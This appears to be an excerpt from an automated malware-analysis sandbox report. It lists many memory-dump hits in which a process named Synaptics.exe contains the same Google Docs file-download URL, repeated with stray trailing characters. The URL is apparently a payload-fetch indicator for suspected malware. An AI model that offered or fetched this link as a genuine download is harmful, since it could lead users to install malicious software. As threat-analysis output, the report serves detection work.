                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-9
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-HDs
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-u6e
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-x
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.K
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download._
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cn0
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.000000000064D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/:
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/F
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/v
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                                Source: Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0%
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0(
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download04
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0:
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0AntC
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0Jn
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0On~
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0px;min-height:180px;paddi
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1?
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1W
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2;
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.000000000064D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3q
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4E
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4N
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4X
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5KLr
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5Z
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5_
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6_
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download79
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7A
                                Source: Synaptics.exe, 00000010.00000002.2339639784.000000002A5BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7c
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7d
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7p
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7u
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8D
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8DOrm
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8HIs
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8I
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9;
                                Source: Synaptics.exe, 00000010.00000002.2290485168.000000001B97E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9c
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000752C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:#ff0
                                Source: Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:2
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download::
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:F
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:d
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;Y
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;s
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;t
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=_
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=y
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?r
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?w
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA:
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAPPKBE
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAeore
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB5
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBA
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBJ
